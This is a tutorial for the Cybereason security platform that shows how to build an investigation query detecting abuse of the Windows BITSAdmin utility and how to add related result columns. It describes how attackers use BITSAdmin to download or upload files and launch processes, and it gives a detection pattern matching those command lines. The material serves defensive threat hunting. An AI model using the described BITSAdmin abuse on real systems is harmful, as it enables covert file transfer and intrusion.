Customize Query Results - Tutorial

In this tutorial, we explain, step-by-step, how to customize the investigation query results you receive by adding columns in the query builder.

For the tutorial scenario, we use a sample query that searches for instances of the BITSAdmin LOLBin technique. The BITSAdmin utility is a command-line tool included as part of the Windows operating system that enables you to create and monitor BITS jobs on the machine. Use of this utility is one of the most popular LOLBin attacks used by malicious actors, as the attacker can use the BITSAdmin utility to launch a malicious process, upload or download files, upload files from a compromised host, and so forth.

Once of the powerful parts of the Cybereason platform’s Cross Machine Correlation (CMC) engine is the integrated and correlated data model. In this mode, the Cybereason platform both correlates information about a specific Element (i.e. process details for a process) but also correlates data about other Elements to related Elements (such as Connections for a Process, Processes related to a Process, Machines related to a Process, and so forth).

Because of this correlation, you do not need to spend time analyzing results from a specific query and then cross-referencing details from those results to results from another query for a different Element. This saves you considerable time and enables you to quickly see relationships between all parts of your organization and different events happening in your environment.

When you build a query, you have the ability to return related Features from another Element (such as connections for a process, machines for a proces, and so forth) simply by adding specific columns in the results for the query.

Step 1: Create the query

For this tutorial, you create a query to find instances of the BITSAdmin LOLBin technique. Once you have the query, you can then add more columns to return related information about instances of the BITAdmin utility.

To build the query, follow these steps:

  1. In your Cybereason platform, navigate to the Investigation screen.

  2. In the Investigation screen, add a Process Element.

  3. Below the Process Element, in the Search for filters filed, enter Process name and select it from the dropdown list.

  4. Select contains.

  5. Enter bitsadmin.exe for the value for the Process name filter.

  6. Next to the bitsadmin.exe value, enter Command line and select it from the dropdown list.

  7. Select contains.

  8. Enter add file OR transfer OR download for the values.

Your query should look like this:

Sample query for tutorial on how to customize query results

Add additional columns

For the results, given what we know about the use of the BITSAdmin utility by attackers, there are potentially a few worthwhile items to investigate:

  • Child processes launched by BITSAdmin

  • Files opened by the BITSAdmin utility

  • Connections made by the utility

  • Machines on which the utility was run (as there are also instances where the utility is used legitimately)

Given these criteria, there are numerous different columns to add as part of the query results.

To add relevant columns, follow these steps:

  1. Below the query builder, above the results area, click Edit columns.

  2. In the Edit columns dialog box, in the upper-right hand corner, in the Search all columns field, enter Children. The Cybereason platform displays a list of related Features.

  3. From the list of columns, select Children.

    Select the Children column for our sample query

    This adds the Children column to the list of results. This column is only visible when you run the query.

  4. Repeat steps 2 and 3 to add additional columns:

    Column

    Purpose

    Owner machine

    The machine on which the instance of the BITSAdmin utility was found.

    Connections

    A list of connections made by instances of the BITSAdmin utility.

    Opened files

    A list of files opened by the BITSAdmin utility.

    Has external connection

    Has internal connection

    Has outgoing connection

    Indicates whether the instance of the BITS Admin utility has opened internal, external, or outgoing connections.

    There are numerous additional columns (Features) available to use with this query. However, the columns we have added can sufficiently provide some initial data for our query example.

    All additional columns selected

  5. Run the query.

View the results

After you have built the query and selected the columns, when you run the query, the Cybereason platform returns relevant instances of the process, but also adds a column for each item you selected in the Edit columns dialog box.

Look at the results to see related information for each column:

Relevant columns displayed in the results.

Each of these columns adds the additional data about related Elements to the process results instance, in addition to the details you view in the Element Details screen for a particular results instance.